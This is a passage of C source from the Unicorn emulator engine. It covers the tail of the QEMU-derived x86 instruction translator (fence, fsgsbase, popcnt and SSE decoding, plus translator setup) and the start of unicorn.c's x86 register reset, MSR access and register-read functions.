s->tmp1_i64); } break; CASE_MODRM_MEM_OP(7): /* clflush / clflushopt */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } if (prefixes & PREFIX_DATA) { /* clflushopt */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_CLFLUSHOPT)) { goto illegal_op; } } else { /* clflush */ if ((s->prefix & (PREFIX_REPZ | PREFIX_REPNZ)) || !(s->cpuid_features & CPUID_CLFLUSH)) { goto illegal_op; } } gen_nop_modrm(env, s, modrm); break; case 0xc0: /* rdfsbase (f3 0f ae /0) */ case 0xc1: /* rdfsbase (f3 0f ae /0) */ case 0xc2: /* rdfsbase (f3 0f ae /0) */ case 0xc3: /* rdfsbase (f3 0f ae /0) */ case 0xc4: /* rdfsbase (f3 0f ae /0) */ case 0xc5: /* rdfsbase (f3 0f ae /0) */ case 0xc6: /* rdfsbase (f3 0f ae /0) */ case 0xc7: /* rdfsbase (f3 0f ae /0) */ case 0xc8: /* rdgsbase (f3 0f ae /1) */ case 0xc9: /* rdgsbase (f3 0f ae /1) */ case 0xca: /* rdgsbase (f3 0f ae /1) */ case 0xcb: /* rdgsbase (f3 0f ae /1) */ case 0xcc: /* rdgsbase (f3 0f ae /1) */ case 0xcd: /* rdgsbase (f3 0f ae /1) */ case 0xce: /* rdgsbase (f3 0f ae /1) */ case 0xcf: /* rdgsbase (f3 0f ae /1) */ case 0xd0: /* wrfsbase (f3 0f ae /2) */ case 0xd1: /* wrfsbase (f3 0f ae /2) */ case 0xd2: /* wrfsbase (f3 0f ae /2) */ case 0xd3: /* wrfsbase (f3 0f ae /2) */ case 0xd4: /* wrfsbase (f3 0f ae /2) */ case 0xd5: /* wrfsbase (f3 0f ae /2) */ case 0xd6: /* wrfsbase (f3 0f 
ae /2) */ case 0xd7: /* wrfsbase (f3 0f ae /2) */ case 0xd8: /* wrgsbase (f3 0f ae /3) */ case 0xd9: /* wrgsbase (f3 0f ae /3) */ case 0xda: /* wrgsbase (f3 0f ae /3) */ case 0xdb: /* wrgsbase (f3 0f ae /3) */ case 0xdc: /* wrgsbase (f3 0f ae /3) */ case 0xdd: /* wrgsbase (f3 0f ae /3) */ case 0xde: /* wrgsbase (f3 0f ae /3) */ case 0xdf: /* wrgsbase (f3 0f ae /3) */ if (CODE64(s) && (prefixes & PREFIX_REPZ) && !(prefixes & PREFIX_LOCK) && (s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_FSGSBASE)) { TCGv base, treg, src, dst; /* Preserve hflags bits by testing CR4 at runtime. */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, CR4_FSGSBASE_MASK); gen_helper_cr4_testbit(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); base = tcg_ctx->cpu_seg_base[modrm & 8 ? R_GS : R_FS]; treg = tcg_ctx->cpu_regs[(modrm & 7) | REX_B(s)]; if (modrm & 0x10) { /* wr*base */ dst = base, src = treg; } else { /* rd*base */ dst = treg, src = base; } if (s->dflag == MO_32) { tcg_gen_ext32u_tl(tcg_ctx, dst, src); } else { tcg_gen_mov_tl(tcg_ctx, dst, src); } break; } goto unknown_op; case 0xf8: /* sfence / pcommit */ if (prefixes & PREFIX_DATA) { /* pcommit */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_PCOMMIT) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } break; } /* fallthru */ case 0xf9: /* sfence */ case 0xfa: /* sfence */ case 0xfb: /* sfence */ case 0xfc: /* sfence */ case 0xfd: /* sfence */ case 0xfe: /* sfence */ case 0xff: /* sfence */ if (!(s->cpuid_features & CPUID_SSE) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } tcg_gen_mb(tcg_ctx, TCG_MO_ST_ST | TCG_BAR_SC); break; case 0xe8: /* lfence */ case 0xe9: /* lfence */ case 0xea: /* lfence */ case 0xeb: /* lfence */ case 0xec: /* lfence */ case 0xed: /* lfence */ case 0xee: /* lfence */ case 0xef: /* lfence */ if (!(s->cpuid_features & CPUID_SSE) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } tcg_gen_mb(tcg_ctx, TCG_MO_LD_LD | TCG_BAR_SC); break; case 0xf0: /* mfence */ case 0xf1: /* mfence */ case 0xf2: /* mfence */ case 0xf3: /* mfence */ case 0xf4: /* mfence */ case 0xf5: /* mfence */ case 0xf6: /* mfence */ case 0xf7: /* mfence */ if (!(s->cpuid_features & CPUID_SSE2) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); break; default: goto unknown_op; } break; case 0x10d: /* 3DNow! prefetch(w) */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; gen_nop_modrm(env, s, modrm); break; case 0x1aa: /* rsm */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_RSM); if (!(s->flags & HF_SMM_MASK)) goto illegal_op; gen_update_cc_op(s); gen_jmp_im(s, s->pc - s->cs_base); gen_helper_rsm(tcg_ctx, tcg_ctx->cpu_env); gen_eob(s); break; case 0x1b8: /* SSE4.2 popcnt */ if ((prefixes & (PREFIX_REPZ | PREFIX_LOCK | PREFIX_REPNZ)) != PREFIX_REPZ) goto illegal_op; if (!(s->cpuid_ext_features & CPUID_EXT_POPCNT)) goto illegal_op; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; if (s->prefix & PREFIX_DATA) { ot = MO_16; } else { ot = mo_64_32(dflag); } gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_extu(tcg_ctx, ot, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); tcg_gen_ctpop_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, ot, reg, s->T0); set_cc_op(s, CC_OP_POPCNT); break; case 0x10e: case 0x10f: /* 3DNow! 
instructions, ignore prefixes */ s->prefix &= ~(PREFIX_REPZ | PREFIX_REPNZ | PREFIX_DATA); /* fall through */ case 0x110: case 0x111: case 0x112: case 0x113: case 0x114: case 0x115: case 0x116: case 0x117: case 0x128: case 0x129: case 0x12a: case 0x12b: case 0x12c: case 0x12d: case 0x12e: case 0x12f: case 0x138: case 0x139: case 0x13a: // case 0x150 ... 0x179: case 0x17c: case 0x17d: case 0x17e: case 0x17f: case 0x1c2: case 0x1c4: case 0x1c5: case 0x1c6: // case 0x1d0 ... 0x1fe: gen_sse(env, s, b, pc_start, rex_r); break; default: if (b >= 0x150 && b <= 0x179) { gen_sse(env, s, b, pc_start, rex_r); break; } if (b >= 0x1d0 && b <= 0x1fe) { gen_sse(env, s, b, pc_start, rex_r); break; } goto unknown_op; } if (insn_hook) { // Unicorn: patch the callback to have the proper instruction size. if (prev_op) { // As explained further up in the function where prev_op is // assigned, we move forward in the tail queue, so we're modifying the // move instruction generated by gen_uc_tracecode() that contains // the instruction size to assign the proper size (replacing 0xF1F1F1F1). tcg_op = QTAILQ_NEXT(prev_op, link); } else { // this instruction is the first emulated code ever, // so the operand is the first operand tcg_op = QTAILQ_FIRST(&tcg_ctx->ops); } tcg_op->args[1] = s->pc - pc_start; } return s->pc; illegal_op: gen_illegal_opcode(s); return s->pc; unknown_op: gen_unknown_opcode(env, s); return s->pc; } void tcg_x86_init(struct uc_struct *uc) { static const char reg_names[CPU_NB_REGS][4] = { #ifdef TARGET_X86_64 [R_EAX] = "rax", [R_EBX] = "rbx", [R_ECX] = "rcx", [R_EDX] = "rdx", [R_ESI] = "rsi", [R_EDI] = "rdi", [R_EBP] = "rbp", [R_ESP] = "rsp", [8] = "r8", [9] = "r9", [10] = "r10", [11] = "r11", [12] = "r12", [13] = "r13", [14] = "r14", [15] = "r15", #else [R_EAX] = "eax", [R_EBX] = "ebx", [R_ECX] = "ecx", [R_EDX] = "edx", [R_ESI] = "esi", [R_EDI] = "edi", [R_EBP] = "ebp", [R_ESP] = "esp", #endif }; static const char seg_base_names[6][8] = { [R_CS] = "cs_base", [R_DS] = "ds_base", [R_ES] = "es_base", [R_FS] = "fs_base", [R_GS] = "gs_base", [R_SS] = "ss_base", }; static const char bnd_regl_names[4][8] = { "bnd0_lb", "bnd1_lb", "bnd2_lb", "bnd3_lb" }; static const char bnd_regu_names[4][8] = { "bnd0_ub", "bnd1_ub", "bnd2_ub", "bnd3_ub" }; int i; TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->cpu_cc_op = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_op), "cc_op"); tcg_ctx->cpu_cc_dst = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_dst), "cc_dst"); tcg_ctx->cpu_cc_src = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_src), "cc_src"); tcg_ctx->cpu_cc_src2 = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_src2), "cc_src2"); for (i = 0; i < CPU_NB_REGS; ++i) { tcg_ctx->cpu_regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, regs[i]), reg_names[i]); } for (i = 0; i < 6; ++i) { tcg_ctx->cpu_seg_base[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[i].base), seg_base_names[i]); } for (i = 0; i < 4; ++i) { tcg_ctx->cpu_bndl[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, bnd_regs[i].lb), bnd_regl_names[i]); tcg_ctx->cpu_bndu[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, bnd_regs[i].ub), bnd_regu_names[i]); } } static void i386_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = cpu->uc->tcg_ctx; 
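/*
 * The instruction size patched into args[1] at the end of disas_insn()
 * above is ultimately what a client's UC_HOOK_CODE callback receives as
 * its `size` argument. A minimal sketch of such a client-side hook
 * (hypothetical user code, not part of this file):
 *
 *     static void hook_code(uc_engine *uc, uint64_t address, uint32_t size,
 *                           void *user_data)
 *     {
 *         // `size` is the byte length computed as s->pc - pc_start;
 *         // the 0xF1F1F1F1 placeholder is never visible here.
 *         printf("insn @ 0x%" PRIx64 ", %u bytes\n", address, size);
 *     }
 *
 *     uc_hook hh;
 *     uc_hook_add(uc, &hh, UC_HOOK_CODE, hook_code, NULL, 1, 0);
 */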
CPUX86State *env = cpu->env_ptr; uint32_t flags = dc->base.tb->flags; target_ulong cs_base = dc->base.tb->cs_base; // unicorn setup dc->uc = cpu->uc; dc->pe = (flags >> HF_PE_SHIFT) & 1; dc->code32 = (flags >> HF_CS32_SHIFT) & 1; dc->ss32 = (flags >> HF_SS32_SHIFT) & 1; dc->addseg = (flags >> HF_ADDSEG_SHIFT) & 1; dc->f_st = 0; dc->vm86 = (flags >> VM_SHIFT) & 1; dc->cpl = (flags >> HF_CPL_SHIFT) & 3; dc->iopl = (flags >> IOPL_SHIFT) & 3; dc->tf = (flags >> TF_SHIFT) & 1; dc->cc_op = CC_OP_DYNAMIC; dc->cc_op_dirty = false; dc->cs_base = cs_base; dc->popl_esp_hack = 0; /* select memory access functions */ dc->mem_index = 0; dc->mem_index = cpu_mmu_index(env, false); dc->cpuid_features = env->features[FEAT_1_EDX]; dc->cpuid_ext_features = env->features[FEAT_1_ECX]; dc->cpuid_ext2_features = env->features[FEAT_8000_0001_EDX]; dc->cpuid_ext3_features = env->features[FEAT_8000_0001_ECX]; dc->cpuid_7_0_ebx_features = env->features[FEAT_7_0_EBX]; dc->cpuid_xsave_features = env->features[FEAT_XSAVE]; #ifdef TARGET_X86_64 dc->lma = (flags >> HF_LMA_SHIFT) & 1; dc->code64 = (flags >> HF_CS64_SHIFT) & 1; #endif dc->flags = flags; dc->jmp_opt = !(dc->tf || dc->base.singlestep_enabled || (flags & HF_INHIBIT_IRQ_MASK)); /* Do not optimize repz jumps at all in icount mode, because rep movsS instructions are executed with different paths in the !repz_opt and repz_opt modes. The first one was always used, except in single-step mode. This setting disables the jump optimization, so the control paths become equivalent in run and single-step modes. Now there will be no jump optimization for repz in record/replay modes and there will always be an additional step for ecx=0 when icount is enabled. */ dc->repz_opt = !dc->jmp_opt && !(tb_cflags(dc->base.tb) & CF_USE_ICOUNT); #if 0 /* check addseg logic */ if (!dc->addseg && (dc->vm86 || !dc->pe || !dc->code32)) printf("ERROR addseg\n"); #endif dc->T0 = tcg_temp_new(tcg_ctx); dc->T1 = tcg_temp_new(tcg_ctx); dc->A0 = tcg_temp_new(tcg_ctx); dc->tmp0 = tcg_temp_new(tcg_ctx); dc->tmp1_i64 = tcg_temp_new_i64(tcg_ctx); dc->tmp2_i32 = tcg_temp_new_i32(tcg_ctx); dc->tmp3_i32 = tcg_temp_new_i32(tcg_ctx); dc->tmp4 = tcg_temp_new(tcg_ctx); dc->ptr0 = tcg_temp_new_ptr(tcg_ctx); dc->ptr1 = tcg_temp_new_ptr(tcg_ctx); dc->cc_srcT = tcg_temp_local_new(tcg_ctx); } static void i386_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void i386_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; dc->prev_pc = dc->base.pc_next - dc->cs_base; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, dc->cc_op); } static bool i386_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); /* If RF is set, suppress an internally generated breakpoint. */ int flags = dc->base.tb->flags & HF_RF_MASK ? BP_GDB : BP_ANY; if (bp->flags & flags) { gen_debug(dc, dc->base.pc_next - dc->cs_base); dc->base.is_jmp = DISAS_NORETURN; /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order for it to be properly cleared -- thus we increment the PC here so that the generic logic setting tb->size later does the right thing.
*/ dc->base.pc_next += 1; return true; } else { return false; } } static void i386_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); target_ulong pc_next; pc_next = disas_insn(dc, cpu); if (dc->tf || (dc->base.tb->flags & HF_INHIBIT_IRQ_MASK)) { /* if single step mode, we generate only one instruction and generate an exception */ /* if irq were inhibited with HF_INHIBIT_IRQ_MASK, we clear the flag and abort the translation to give the irqs a chance to happen */ dc->base.is_jmp = DISAS_TOO_MANY; } else if ((tb_cflags(dc->base.tb) & CF_USE_ICOUNT) && ((pc_next & TARGET_PAGE_MASK) != ((pc_next + TARGET_MAX_INSN_SIZE - 1) & TARGET_PAGE_MASK) || (pc_next & ~TARGET_PAGE_MASK) == 0)) { /* Do not cross the boundary of the pages in icount mode, it can cause an exception. Do it only when boundary is crossed by the first instruction in the block. If current instruction already crossed the bound - it's ok, because an exception hasn't stopped this code. */ dc->base.is_jmp = DISAS_TOO_MANY; } else if ((pc_next - dc->base.pc_first) >= (TARGET_PAGE_SIZE - 32)) { dc->base.is_jmp = DISAS_TOO_MANY; } dc->base.pc_next = pc_next; } static void i386_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); if (dc->base.is_jmp == DISAS_TOO_MANY) { gen_jmp_im(dc, dc->base.pc_next - dc->cs_base); gen_eob(dc); } } static const TranslatorOps i386_tr_ops = { .init_disas_context = i386_tr_init_disas_context, .tb_start = i386_tr_tb_start, .insn_start = i386_tr_insn_start, .breakpoint_check = i386_tr_breakpoint_check, .translate_insn = i386_tr_translate_insn, .tb_stop = i386_tr_tb_stop, }; /* generate intermediate code for basic block 'tb'. */ void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns) { DisasContext dc; memset(&dc, 0, sizeof(dc)); translator_loop(&i386_tr_ops, &dc.base, cpu, tb, max_insns); } void restore_state_to_opc(CPUX86State *env, TranslationBlock *tb, target_ulong *data) { int cc_op = data[1]; env->eip = data[0] - tb->cs_base; if (cc_op != CC_OP_DYNAMIC) { env->cc_op = cc_op; } }
unicorn-2.1.1/qemu/target/i386/unicorn.c
/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "uc_priv.h" #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include <unicorn/x86.h> /* needed for uc_x86_mmr */ #include "unicorn.h" #define FPST(n) (env->fpregs[(env->fpstt + (n)) & 7].d) #define X86_NON_CS_FLAGS (DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK) static void load_seg_16_helper(CPUX86State *env, int seg, uint32_t selector) { cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, X86_NON_CS_FLAGS); } void cpu_get_fp80(uint64_t *pmant, uint16_t
*pexp, floatx80 f); floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper); extern void helper_wrmsr(CPUX86State *env); extern void helper_rdmsr(CPUX86State *env); static void x86_set_pc(struct uc_struct *uc, uint64_t address) { if (uc->mode == UC_MODE_16) { int16_t cs = (uint16_t)X86_CPU(uc->cpu)->env.segs[R_CS].selector; ((CPUX86State *)uc->cpu->env_ptr)->eip = address - cs * 16; } else ((CPUX86State *)uc->cpu->env_ptr)->eip = address; } static uint64_t x86_get_pc(struct uc_struct *uc) { if (uc->mode == UC_MODE_16) { return X86_CPU(uc->cpu)->env.segs[R_CS].selector * 16 + ((CPUX86State *)uc->cpu->env_ptr)->eip; } else { return ((CPUX86State *)uc->cpu->env_ptr)->eip; } } static void x86_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; X86CPU *cpu = (X86CPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; X86CPUClass *xcc = X86_CPU_GET_CLASS(cpu); release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } free(xcc->model); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->regs, 0, sizeof(env->regs)); memset(env->segs, 0, sizeof(env->segs)); memset(env->cr, 0, sizeof(env->cr)); memset(&env->ldt, 0, sizeof(env->ldt)); memset(&env->gdt, 0, sizeof(env->gdt)); memset(&env->tr, 0, sizeof(env->tr)); memset(&env->idt, 0, sizeof(env->idt)); env->eip = 0; cpu_load_eflags(env, 0, -1); env->cc_op = CC_OP_EFLAGS; env->fpstt = 0; /* top of stack index */ env->fpus = 0; env->fpuc = 0; memset(env->fptags, 0, sizeof(env->fptags)); /* 0 = valid, 1 = empty */ env->mxcsr = 0; memset(env->xmm_regs, 0, sizeof(env->xmm_regs)); memset(&env->xmm_t0, 0, sizeof(env->xmm_t0)); memset(&env->mmx_t0, 0, sizeof(env->mmx_t0)); memset(env->ymmh_regs, 0, sizeof(env->ymmh_regs)); memset(env->opmask_regs, 0, sizeof(env->opmask_regs)); memset(env->zmmh_regs, 0, sizeof(env->zmmh_regs)); /* sysenter registers */ env->sysenter_cs = 0; env->sysenter_esp = 0; env->sysenter_eip = 0; env->efer = 0; env->star = 0; env->vm_hsave = 0; env->tsc = 0; env->tsc_adjust = 0; env->tsc_deadline = 0; env->mcg_status = 0; env->msr_ia32_misc_enable = 0; env->msr_ia32_feature_control = 0; env->msr_fixed_ctr_ctrl = 0; env->msr_global_ctrl = 0; env->msr_global_status = 0; env->msr_global_ovf_ctrl = 0; memset(env->msr_fixed_counters, 0, sizeof(env->msr_fixed_counters)); memset(env->msr_gp_counters, 0, sizeof(env->msr_gp_counters)); memset(env->msr_gp_evtsel, 0, sizeof(env->msr_gp_evtsel)); #ifdef TARGET_X86_64 memset(env->hi16_zmm_regs, 0, sizeof(env->hi16_zmm_regs)); env->lstar = 0; env->cstar = 0; env->fmask = 0; env->kernelgsbase = 0; #endif // TODO: reset other registers in CPUX86State qemu/target-i386/cpu.h // properly initialize internal setup for each mode switch (uc->mode) { default: break; case UC_MODE_16: env->hflags = 0; env->cr[0] = 0; // undo the damage done by the memset of env->segs above // for R_CS, not quite the same as x86_cpu_reset cpu_x86_load_seg_cache(env, R_CS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); // remainder yields same state as x86_cpu_reset load_seg_16_helper(env, R_DS, 0); load_seg_16_helper(env, R_ES, 0); load_seg_16_helper(env, R_SS, 0); load_seg_16_helper(env, R_FS, 0); load_seg_16_helper(env, R_GS, 0); break; case UC_MODE_32: env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_OSFXSR_MASK; cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode break; case 
UC_MODE_64: env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK | HF_LMA_MASK | HF_OSFXSR_MASK; env->hflags &= ~(HF_ADDSEG_MASK); env->efer |= MSR_EFER_LMA | MSR_EFER_LME; // extended mode activated cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode /* If we are operating in 64bit mode then add the Long Mode flag * to the CPUID feature flag */ env->features[FEAT_8000_0001_EDX] |= CPUID_EXT2_LM; break; } } static int x86_msr_read(CPUX86State *env, uc_x86_msr *msr) { uint64_t ecx = env->regs[R_ECX]; uint64_t eax = env->regs[R_EAX]; uint64_t edx = env->regs[R_EDX]; env->regs[R_ECX] = msr->rid; helper_rdmsr(env); msr->value = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); env->regs[R_EAX] = eax; env->regs[R_ECX] = ecx; env->regs[R_EDX] = edx; /* The implementation doesn't throw exception or return an error if there is * one, so we will return 0. */ return 0; } static int x86_msr_write(CPUX86State *env, uc_x86_msr *msr) { uint64_t ecx = env->regs[R_ECX]; uint64_t eax = env->regs[R_EAX]; uint64_t edx = env->regs[R_EDX]; env->regs[R_ECX] = msr->rid; env->regs[R_EAX] = (unsigned int)msr->value; env->regs[R_EDX] = (unsigned int)(msr->value >> 32); helper_wrmsr(env); env->regs[R_ECX] = ecx; env->regs[R_EAX] = eax; env->regs[R_EDX] = edx; /* The implementation doesn't throw exception or return an error if there is * one, so we will return 0. */ return 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUX86State *env = _env; uc_err ret = UC_ERR_ARG; switch (regid) { default: break; case UC_X86_REG_FP0: case UC_X86_REG_FP1: case UC_X86_REG_FP2: case UC_X86_REG_FP3: case UC_X86_REG_FP4: case UC_X86_REG_FP5: case UC_X86_REG_FP6: case UC_X86_REG_FP7: { CHECK_REG_TYPE(char[10]); floatx80 reg = env->fpregs[regid - UC_X86_REG_FP0].d; cpu_get_fp80(value, (uint16_t *)((char *)value + sizeof(uint64_t)), reg); return ret; } case UC_X86_REG_FPSW: { CHECK_REG_TYPE(uint16_t); uint16_t fpus = env->fpus; fpus = fpus & ~0x3800; fpus |= (env->fpstt & 0x7) << 11; *(uint16_t *)value = fpus; return ret; } case UC_X86_REG_FPCW: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpuc; return ret; case UC_X86_REG_FPTAG: { CHECK_REG_TYPE(uint16_t); #define EXPD(fp) (fp.l.upper & 0x7fff) #define MANTD(fp) (fp.l.lower) #define MAXEXPD 0x7fff int fptag, exp, i; uint64_t mant; CPU_LDoubleU tmp; fptag = 0; for (i = 7; i >= 0; i--) { fptag <<= 2; if (env->fptags[i]) { fptag |= 3; } else { tmp.d = env->fpregs[i].d; exp = EXPD(tmp); mant = MANTD(tmp); if (exp == 0 && mant == 0) { /* zero */ fptag |= 1; } else if (exp == 0 || exp == MAXEXPD || (mant & (1LL << 63)) == 0) { /* NaNs, infinity, denormal */ fptag |= 2; } } } *(uint16_t *)value = fptag; return ret; } case UC_X86_REG_XMM0: case UC_X86_REG_XMM1: case UC_X86_REG_XMM2: case UC_X86_REG_XMM3: case UC_X86_REG_XMM4: case UC_X86_REG_XMM5: case UC_X86_REG_XMM6: case UC_X86_REG_XMM7: { CHECK_REG_TYPE(float64[2]); float64 *dst = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; dst[0] = reg->ZMM_Q(0); dst[1] = reg->ZMM_Q(1); return ret; } case UC_X86_REG_ST0: case UC_X86_REG_ST1: case UC_X86_REG_ST2: case UC_X86_REG_ST3: case UC_X86_REG_ST4: case UC_X86_REG_ST5: case UC_X86_REG_ST6: case UC_X86_REG_ST7: { CHECK_REG_TYPE(char[10]); memcpy(value, &FPST(regid - UC_X86_REG_ST0), 10); return ret; } case UC_X86_REG_YMM0: case UC_X86_REG_YMM1: case UC_X86_REG_YMM2: case UC_X86_REG_YMM3: case UC_X86_REG_YMM4: case UC_X86_REG_YMM5: case UC_X86_REG_YMM6: case 
UC_X86_REG_YMM7: case UC_X86_REG_YMM8: case UC_X86_REG_YMM9: case UC_X86_REG_YMM10: case UC_X86_REG_YMM11: case UC_X86_REG_YMM12: case UC_X86_REG_YMM13: case UC_X86_REG_YMM14: case UC_X86_REG_YMM15: { CHECK_REG_TYPE(float64[4]); float64 *dst = (float64 *)value; ZMMReg *lo_reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_YMM0]; XMMReg *hi_reg = &env->ymmh_regs[regid - UC_X86_REG_YMM0]; dst[0] = lo_reg->ZMM_Q(0); dst[1] = lo_reg->ZMM_Q(1); dst[2] = hi_reg->_d[0]; dst[3] = hi_reg->_d[1]; return ret; } case UC_X86_REG_FIP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->fpip; return ret; case UC_X86_REG_FCS: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpcs; return ret; case UC_X86_REG_FDP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->fpdp; return ret; case UC_X86_REG_FDS: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpds; return ret; case UC_X86_REG_FOP: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpop; return ret; } switch (mode) { default: break; case UC_MODE_16: switch (regid) { default: break; case UC_X86_REG_ES: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_ES].selector; return ret; case UC_X86_REG_SS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_SS].selector; return ret; case UC_X86_REG_DS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_DS].selector; return ret; case UC_X86_REG_FS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_FS].selector; return ret; case UC_X86_REG_GS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_GS].selector; return ret; case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = (uint32_t)env->segs[R_FS].base; return ret; } // fall-thru case UC_MODE_32: switch (regid) { default: break; case UC_X86_REG_CR0: case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: case UC_X86_REG_CR4: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->cr[regid - UC_X86_REG_CR0]; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->dr[regid - UC_X86_REG_DR0]; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_EAX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EAX]; break; case UC_X86_REG_AX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EAX]); break; case UC_X86_REG_AH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EAX]); break; case UC_X86_REG_AL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EAX]); break; case UC_X86_REG_EBX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EBX]; break; case UC_X86_REG_BX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBX]); break; case UC_X86_REG_BH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EBX]); break; case UC_X86_REG_BL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EBX]); break; case UC_X86_REG_ECX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_ECX]; break; case UC_X86_REG_CX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ECX]); break; case UC_X86_REG_CH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_ECX]); break; case UC_X86_REG_CL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = 
